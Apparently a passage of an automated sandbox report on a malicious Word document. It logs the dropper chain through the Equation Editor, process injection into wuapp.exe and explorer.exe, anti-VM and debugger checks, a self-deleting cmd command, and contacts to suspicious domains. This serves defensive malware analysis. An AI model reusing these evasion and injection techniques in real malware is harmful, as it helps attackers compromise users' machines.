Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A0010C NtOpenDirectoryObject, 6_2_00A0010C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A01148 NtOpenThread, 6_2_00A01148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk, 8_2_01F600C4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk, 8_2_01F607AC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk, 8_2_01F5F9F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk, 8_2_01F5F900
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_01F5FBB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_01F5FB68
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk, 8_2_01F5FB50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_01F5FAE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01F5FAD0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk, 8_2_01F5FAB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01F5FDC0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk, 8_2_01F5FD8C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_01F5FC60
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk, 8_2_01F5FFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01F5FED0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F601D4 NtSetValueKey, 8_2_01F601D4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F61148 NtOpenThread, 8_2_01F61148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F6010C NtOpenDirectoryObject, 8_2_01F6010C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F610D0 NtOpenProcessToken, 8_2_01F610D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F60078 NtResumeThread, 8_2_01F60078
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F60060 NtQuerySection, 8_2_01F60060
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F60048 NtProtectVirtualMemory, 8_2_01F60048
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F61930 NtSetContextThread, 8_2_01F61930
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5F938 NtWriteFile, 8_2_01F5F938
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5F8CC NtWaitForSingleObject, 8_2_01F5F8CC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FBE8 NtQueryVirtualMemory, 8_2_01F5FBE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FA50 NtEnumerateValueKey, 8_2_01F5FA50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FA20 NtQueryInformationFile, 8_2_01F5FA20
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F61D80 NtSuspendThread, 8_2_01F61D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FD5C NtEnumerateKey, 8_2_01F5FD5C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FC90 NtUnmapViewOfSection, 8_2_01F5FC90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F60C40 NtGetContextThread, 8_2_01F60C40
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FC48 NtSetInformationFile, 8_2_01F5FC48
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FC30 NtOpenProcess, 8_2_01F5FC30
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FFFC NtCreateProcessEx, 8_2_01F5FFFC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FF34 NtQueueApcThread, 8_2_01F5FF34
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FEA0 NtReadVirtualMemory, 8_2_01F5FEA0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5FE24 NtWriteVirtualMemory, 8_2_01F5FE24
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA350 NtCreateFile, 8_2_000AA350
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA400 NtReadFile, 8_2_000AA400
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA480 NtClose, 8_2_000AA480
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA530 NtAllocateVirtualMemory, 8_2_000AA530
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA34A NtCreateFile, 8_2_000AA34A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA3FB NtReadFile, 8_2_000AA3FB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AA47B NtClose, 8_2_000AA47B
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\word.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\word.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 77740000 page execute and read and write
Source: Revised RFQ-PO180911.doc Virustotal: Detection: 31%
Source: Revised RFQ-PO180911.doc ReversingLabs: Detection: 32%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
Source: C:\Users\user\AppData\Roaming\word.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$vised RFQ-PO180911.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6029.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@11/14@5/3
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar, 4_2_00402078
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_00404333
Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_009061EC push FFFFFFF0h; ret 2_2_00906398
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00906330 push FFFFFFF0h; ret 2_2_00906398
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009AF225 push ecx; ret 5_2_009AF238
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041E9E6 push edx; ret 6_2_0041E9EE
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00416B6D push ebx; ret 6_2_00416B85
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041D4F2 push eax; ret 6_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041D4FB push eax; ret 6_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041D4A5 push eax; ret 6_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041D55C push eax; ret 6_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0041EEB5 push esi; ret 6_2_0041F0D9
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009AF225 push ecx; ret 6_2_009AF238
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F6DFA1 push ecx; ret 8_2_01F6DFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AD4A5 push eax; ret 8_2_000AD4F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AD4FB push eax; ret 8_2_000AD562
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AD4F2 push eax; ret 8_2_000AD4F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AD55C push eax; ret 8_2_000AD562
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AE9E6 push edx; ret 8_2_000AE9EE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000A6B6D push ebx; ret 8_2_000A6B85
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_000AEEB5 push esi; ret 8_2_000AF0D9
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405DDA
Source: C:\Users\user\AppData\Roaming\word.exe File created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\word.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wuapp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3044 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212 Thread sleep time: -42000s >= -30000s
Source: C:\Windows\SysWOW64\wuapp.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00409AA0 rdtsc 6_2_00409AA0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe API coverage: 7.9 %
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405426
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 4_2_00405D9C
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004026A1 FindFirstFileA, 4_2_004026A1
Source: C:\Users\user\AppData\Roaming\word.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW, 5_2_009A320D
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 5_2_009B6AAA
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wuapp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h] 5_2_000F03F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F061D mov eax, dword ptr fs:[00000030h] 5_2_000F061D
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h] 5_2_000F06F7
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h] 5_2_000F0736
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h] 5_2_000F0772
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h] 6_2_00A126F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h] 8_2_01F726F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wuapp.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_0040ACE0 LdrLoadDll, 6_2_0040ACE0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B1D57 SetUnhandledExceptionFilter, 5_2_009B1D57
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_009B1D88
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_009B1D88
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: 6_2_009B1D57 SetUnhandledExceptionFilter, 6_2_009B1D57

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe Network Connect: 98.137.244.37 80
Source: C:\Windows\explorer.exe Domain query: www.storyofsol.com
Source: C:\Windows\explorer.exe Domain query: www.createacarepack.com
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Memory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\wuapp.exe Thread register set: target process: 1860
Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 5_2_009A3663
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_009BE8C3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 5_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 5_2_009BE1D4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 5_2_009B8969
